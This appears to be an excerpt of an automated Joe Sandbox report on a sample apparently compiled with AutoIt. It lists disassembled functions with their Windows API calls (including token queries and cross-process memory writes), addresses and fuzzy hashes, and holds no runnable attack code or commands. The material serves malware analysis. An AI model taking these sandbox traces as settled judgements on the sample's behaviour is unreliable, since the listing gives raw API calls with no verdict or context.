                                                          • Opcode Fuzzy Hash: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                          • Instruction Fuzzy Hash: 19018FB6601204BFDB224F68DC84BEA7BADEF84795F154164FE08E6220D771ED409BA0
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5260
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C526E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5276
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C5280
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                          • Instruction ID: ec49a125320b679ab694fe7908bc2ef7aa130e0b7da0358066b0695ac88af366
                                                          • Opcode Fuzzy Hash: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                          • Instruction Fuzzy Hash: C7016D31D01A1DDBCF11EFE4E888AEDBBBCFB09311F410969E941F6180CB70699087A1
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                          • Instruction ID: 3dec80d18446eb5596bce03d1da17ca7c668572c92a76689aec95df98b66ae62
                                                          • Opcode Fuzzy Hash: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                          • Instruction Fuzzy Hash: B3F06875201344AFD7220F65DCC8EA73BACFF85758F010125F645D6190CBA1DD41DA60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 003BC1F7
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 003BC20E
                                                          • MessageBeep.USER32(00000000), ref: 003BC226
                                                          • KillTimer.USER32(?,0000040A), ref: 003BC242
                                                          • EndDialog.USER32(?,00000001), ref: 003BC25C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                          • Instruction ID: 8a7224d1ac4fbe4760b7b72a45dc866b459a1bf3626a9b33f00e9cd82b708c06
                                                          • Opcode Fuzzy Hash: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                          • Instruction Fuzzy Hash: 0701A7304143089BEF325B50DD8EBD6777CBB0070AF000769A682998E0D7F069448B50
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 003613BF
                                                          • StrokeAndFillPath.GDI32(?,?,0039B888,00000000,?), ref: 003613DB
                                                          • SelectObject.GDI32(?,00000000), ref: 003613EE
                                                          • DeleteObject.GDI32 ref: 00361401
                                                          • StrokePath.GDI32(?), ref: 0036141C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                          • Instruction ID: 5061036940e350964a46e4356e9256b747742f54df32a268b7877602719cab31
                                                          • Opcode Fuzzy Hash: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                          • Instruction Fuzzy Hash: 89F0B630104A48EFDB336F26EC897683FA8AB01326F58C635E429495F5C7B149A6DF54
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 003CC432
                                                          • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CC44A
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          • CoUninitialize.OLE32 ref: 003CC6B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
                                                          • Instruction ID: c84769c0d7fa6587ca0c00cdc7161cb083123352c7492ab80a305a3a5e031a83
                                                          • Opcode Fuzzy Hash: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
                                                          • Instruction Fuzzy Hash: 27A13BB1104205AFD701EF54C891EABB7ECEF99358F00892DF1959B1A2DB71EA09CB52
                                                          APIs
                                                            • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                            • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 00367A51: _memmove.LIBCMT ref: 00367AAB
                                                          • __swprintf.LIBCMT ref: 00372ECD
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00372D66
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: dd2d57a27df31eddd83df50edd754c246f91dece3e2eecd0f8f21e14155196c8
                                                          • Instruction ID: c5fae3a565d101d6bad38709f6a30271984b243a52bd922dc7f8591e1bbcc26b
                                                          • Opcode Fuzzy Hash: dd2d57a27df31eddd83df50edd754c246f91dece3e2eecd0f8f21e14155196c8
                                                          • Instruction Fuzzy Hash: 73914B711082019FC726EF24C896C6FB7E8EF96710F04891DF4969B2A5EB34ED44CB62
                                                          APIs
                                                            • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                          • CoInitialize.OLE32(00000000), ref: 003CB9BB
                                                          • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CB9D4
                                                          • CoUninitialize.OLE32 ref: 003CB9F1
                                                            • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                            • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                          • String ID: .lnk
                                                          • API String ID: 2126378814-24824748
                                                          • Opcode ID: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                          • Instruction ID: 52442a5187f0c9064384edc8981866e4759ddbd522276359683a9c671f8822ec
                                                          • Opcode Fuzzy Hash: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                          • Instruction Fuzzy Hash: 91A153756042059FCB02DF14C885E6ABBE9FF89314F05899DF8999B3A2CB31EC45CB91
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 003BB4BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container$%?
                                                          • API String ID: 3565006973-1141368171
                                                          • Opcode ID: d6bb71ee697d80dd0e9168cefe1c042c89ea659c0a5612e4db6ffd7529d060aa
                                                          • Instruction ID: 3b7ecbe60d3ceba10490633bc9dace6c25e3e331ebd2bf94a43c3b36a7a401f9
                                                          • Opcode Fuzzy Hash: d6bb71ee697d80dd0e9168cefe1c042c89ea659c0a5612e4db6ffd7529d060aa
                                                          • Instruction Fuzzy Hash: 37915D706006019FDB25DF64C884BAAB7F9FF49714F10856EFA4ACB691DBB0E845CB50
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 003850AD
                                                            • Part of subcall function 003900F0: __87except.LIBCMT ref: 0039012B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                          • Instruction ID: d1310af86ccc8edf35f1cb9d3bfe593d392d87145e4919a1a835a9c86e09be13
                                                          • Opcode Fuzzy Hash: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                          • Instruction Fuzzy Hash: D9516DA590C7028ADF1B7B28CD4537E3BA89B40700F218DD9E4D58A2A9DF348DD4DB86
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: 3c7$_7
                                                          • API String ID: 4104443479-4188345352
                                                          • Opcode ID: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                          • Instruction ID: a38e27e558d97082891e8bdddb7d811c8dfc8a9dfd22c95de50022ca9dc5f7a7
                                                          • Opcode Fuzzy Hash: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                          • Instruction Fuzzy Hash: 21518D70D00609DFCB26CF68C884AAEBBB1FF46304F158529E85AE7650EB30A955CF51
                                                          APIs
                                                            • Part of subcall function 003C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B9296,?,?,00000034,00000800,?,00000034), ref: 003C14E6
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003B983F
                                                            • Part of subcall function 003C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003C14B1
                                                            • Part of subcall function 003C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003C1409
                                                            • Part of subcall function 003C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C1419
                                                            • Part of subcall function 003C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C142F
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98AC
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                          • Instruction ID: 8fc99c374fd8045e18211fe96fef7031ad4f7338a21c27b041e13541089314d0
                                                          • Opcode Fuzzy Hash: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                          • Instruction Fuzzy Hash: C3413076900118BFDB15DFA4CC85FDEBBB8EB09300F004199FA45BB191DA716E45DBA0
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EF910,00000000,?,?,?,?), ref: 003E79DF
                                                          • GetWindowLongW.USER32 ref: 003E79FC
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E7A0C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                          • Instruction ID: 62ff8cd1a161ac8653f54bfada8214142949df2c7dccc6e7e53ddc963a16d6da
                                                          • Opcode Fuzzy Hash: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                          • Instruction Fuzzy Hash: 3D31FC3120465AAFDB228E39CC41BEB77A9EF49324F218725F875A72E1D730EC508B50
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003E7461
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003E7475
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E7499
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                          • Instruction ID: d8fa18e74133994fdb98ea3895a8cfb5e8d4aecfa3decc62c6f3407bb906be4c
                                                          • Opcode Fuzzy Hash: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                          • Instruction Fuzzy Hash: 95219132500268AFDF228E55CC46FEA3B69EF48724F110214FE156B1D0DAB5AC919BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003E7C4A
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003E7C58
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003E7C5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                          • Instruction ID: 4f60e0127528c0729cdc4ea582ea03d11262ccb97b9a31a321b5ee64840913ef
                                                          • Opcode Fuzzy Hash: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                          • Instruction Fuzzy Hash: B7219CB1204259AFDB22DF24DCC1DA737ACEB4A394B150159F9019B3A1CB71EC118A60
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E6D3B
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E6D4B
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E6D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                          • Instruction ID: c25ae76c78a5fcaebe6fcf98afad806ea5246afbb54ed5bff4b31b840ae7ec97
                                                          • Opcode Fuzzy Hash: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                          • Instruction Fuzzy Hash: 66218332600168BFDF228F55CC45FBB37AAEF997A0F518224F9455B1D1C6719C5187A0
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 003D3A66
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d$%?
                                                          • API String ID: 3506404897-1727123861
                                                          • Opcode ID: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                          • Instruction ID: b3d51eee7e8d1ccd8fee0688ad858e30f9e03d16d84bf90d6310dd3799062ab9
                                                          • Opcode Fuzzy Hash: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                          • Instruction Fuzzy Hash: 6C219372B00219AFCF12EF64DC82AEE77B5AF44300F50445AF545AB286DB74EE41CB66
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003E7772
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003E7787
